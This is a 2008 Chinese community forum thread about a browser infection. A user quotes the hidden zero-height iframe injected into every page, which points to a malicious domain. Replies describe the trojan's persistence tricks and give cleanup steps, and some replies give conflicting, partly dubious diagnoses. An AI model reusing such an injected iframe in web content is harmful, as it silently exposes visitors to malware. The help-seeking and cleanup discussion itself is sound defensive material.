东台网

标题: [求助]http://gggggttt.cn/1/zz.htm怎么清除 [打印本页]

作者: 爱东台 时间: 2008-10-17 09:42
标题: [求助]http://gggggttt.cn/1/zz.htm怎么清除
不管打开什么网站，IE浏览器最下方总会显示“等待 gggggttt.cn”
还会显示：“正在从 vip2.51.la 传送数据...”等
查看打开网页的源文件，第一行都是：“<iframe src=http://gggggttt.cn/1/zz.htm width=100 height=0></iframe>”
明显的可以看到打开网页的被加了小的东西在里面了！！
360、瑞星、超级兔子、卸载IE都不管用！！！！
help！！！！！！！！！

作者: andy.dai 时间: 2008-10-17 09:45
在你的快速启动里面，Internet Explorer选项的地址被改了。这部算木马或病毒，你只要把快速启动里面的Internet Explorer的快捷方式删除就可以了！

作者: 高山 时间: 2008-10-17 09:46
该木马程序于2008年10月14日中午11点左右开始批量攻击接入互联网的电脑，现将其表现形式及清除意见提出如下，（仅供参考）

该木马通过扫面电脑后门攻击用户IE，用户在感染木马后，该程序会自动接入网络批量下载大量盗号木马，严重影响用户正常使用电脑。

木马表现形式：1，捆绑IE加载项（本机感染后被捆绑的是一个仿迅雷下载组件的东西）
            2，批量下载木马,基本都是存放于C盘根目录，/windows，/windows/system32/，以
               及各临时文件夹内，以*.dll，*.exe等形式存在，在每个分区的根目录下会产生一
               个名为autorun.inf的自动运行文件，很多用户在清除该木马后，由于没能及时清
               除此文件及相应木马而造成二次感染！
            3，屏蔽显示隐藏文件夹选项，使用户不能手动删除相关木马程序。
            4，修改注册表启动项，在电脑启动项中加入病毒的自动运行程序
            5，生成仿系统进程svchost文件。
            6，自动屏蔽360相关网页及软件。

由上可见，并不是该木马作者有多聪明，其实所有的木马程序都是一种类型的表现形式，有点动手能力的可根据以上信息进行手动排毒。

对于该木马的临时解决方案如下：
            1，为防止病毒一直不停的从网络上联机下载木马程序，务必先要进行计算机断网，并进入
               安全模式下操作。
            2，根据本机木马具体情况禁用掉相关IE加载项，杜绝再次感染。
            3，修复注册表项，清除本机病毒所有自动运行项，利用杀毒软件进行全盘扫描（推荐
               使用卡巴2009，或者瑞星2008正式版，务必升级为最新病毒库。）
            4，下载360安全卫士，（注：360安全卫士在大多数情况下只能起到预防及部分拦截
               作用，不能将其等同于杀毒软件使用，也不能过分依赖于任何杀毒软件。）
            5，修复IE相关关联，清楚所有临时文件。（有人说有的东西删不掉怎么办？请使用软件
               粉碎相关流氓文件，或进入光盘系统等脱机处理。）
            6，检查开机启动项，删掉不必要的选项。
            7，杀毒过程中，请注意区别系统及仿系统文件，在手动清理过程中，最好能将相关文件
               打包备份，避免因误删导致的系统问题。
            8，最直接的方法，重装系统。系统安全完成后请使用右键打开资源管理器，显示所有文
               件后，删除其他盘内的自动运行脚本，进行全盘扫毒。（注：切勿双击！）

作者: 爱英统青 时间: 2008-10-17 10:07
太复杂了

作者: 伊酷 时间: 2008-10-17 11:03
这个是内部局域网上的病毒，你要找出中毒的电脑才行，你的电脑可能没中毒。

作者: 月塘诗侣 时间: 2008-10-17 16:54
及时帮新会员解决问题，加分。

欢迎光临东台网 (http://bbs.cn0515.com/)